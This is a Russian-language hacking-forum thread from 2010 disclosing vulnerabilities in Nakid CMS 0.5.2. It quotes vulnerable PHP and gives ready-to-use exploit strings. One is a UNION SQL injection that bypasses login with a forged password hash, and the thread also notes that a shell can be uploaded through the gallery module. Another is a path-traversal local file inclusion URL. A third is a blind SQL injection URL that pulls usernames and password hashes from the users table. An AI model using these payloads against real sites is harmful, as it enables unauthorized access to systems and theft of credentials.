ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Nakid CMS 0.5.2
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Nakid CMS 0.5.2
  #1  
Старый 20.03.2010, 13:46
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию Nakid CMS 0.5.2
NakidCMS 0.5.2

Обход Авторизации && Blind SQLi
login_process.php
mq=off
PHP код:
$post_username $_POST['username'];
$post_password md5($_POST['password']);
$users_query mysql_query("SELECT id,password FROM ".$system_table_prefix."users WHERE username = '".$post_username."' LIMIT 1") or die("<p class='error'>Error: ".mysql_error()."</p>");
if(mysql_num_rows($users_query)<1){
  die("<p class='error'>No such user found</p>");
}
$users_array mysql_fetch_array($users_query);
if($post_password != $users_array['password']){
  die("<p class='error'>Invalid Password</p>");
}
$_SESSION['uid'] = $users_array['id'];
echo("Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");
redirect_page("index.php?p=home"); 
Exploit:
Код:
index.php?p=login_process
POST
username=' union select 1 id,'9003d1df22eb4d3820015070385194c8' password#
password=pwd
P.S.
Заливка шелла через модуль галереи.
Последний раз редактировалось geezer.code; 20.03.2010 в 13:49..
 
Ответить с цитированием

  #2  
Старый 20.03.2010, 15:41
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию
Local File Inclusion

Vuln file: /index.php
Код:
file:/includes/php/first.php
/*...*/
//Get Current Page
if(!empty($_GET['p'])){
	$core['page'] = strtolower($_GET['p']);
}
if(!empty($_GET['pt'])){
	$core['page_type'] = strtolower($_GET['pt']);
}
/*...*/
			if($core['page_type'] == "core"){
				$page_string = "includes/pages/".$core['page'].".php";
				if(file_exists($page_string)){
					include($page_string);
					$page_found = true;
				}
			}
/*...*/
Need: magic_quotes = off
Exploit:
Код:
http://[host]/[path]/index.php?pt=core&p=../../../../../../../[local_file]%00
Blind SQL injection

Vuln file: /includes/pages/users_data.php
Код:
/*...*/
$page = $_GET['page'];   //Requested page
$limit = $_GET['rows'];  //Num of rows
$sidx = $_GET['sidx'];   //Sort by
$sord = $_GET['sord'];   //Sort order
/*...*/
	$SQL = "SELECT * FROM ".$core['table_prefix']."users";
/*...*/
	if(!empty($sidx)){
		$SQL .= " ORDER BY ".$sidx." ".$sord;
	}
/*...*/
Exploit:
Код:
http://[host]/[path]/includes/pages/users_data.php?sidx=1+and+(1,2)=(select+*+from(select+name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1),name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1))x)
__________________
Avant que l'ombre...
 
Ответить с цитированием

  #3  
Старый 23.04.2010, 16:10
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
слив РОА
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Алгоритмы хэширования в различных CMS ErrorNeo Расшифровка хешей 5 02.06.2010 17:41
Как определить вид CMS или форума? Validol Сценарии/CMF/СMS 1 14.09.2009 14:24
10 вещей, которые нужно учитывать при выборе идеальной CMS Andres Статьи 0 27.06.2009 02:38
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ